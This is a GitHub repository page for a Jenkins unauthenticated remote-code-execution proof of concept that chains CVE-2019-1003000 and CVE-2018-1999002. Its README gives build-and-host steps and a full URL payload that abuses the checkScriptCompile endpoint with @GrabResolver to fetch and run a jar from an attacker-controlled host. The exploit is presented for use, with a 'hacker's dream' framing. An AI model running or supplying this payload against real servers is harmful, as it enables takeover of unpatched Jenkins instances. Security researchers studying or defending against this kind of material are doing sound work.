Skip to content
😈 Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)
Branch: master
Clone or download
Latest commit 83555c0 Feb 21, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
code Initial commit Feb 19, 2019
www/package/payload/1 Initial commit Feb 19, 2019
README.txt fixed EXPLOIT HOST Feb 21, 2019
build.sh Initial commit Feb 19, 2019

README.txt

JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

Read his write-ups on this exploit here -
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
His github: https://github.com/orangetw


INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files.


URL Payload:
------------
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.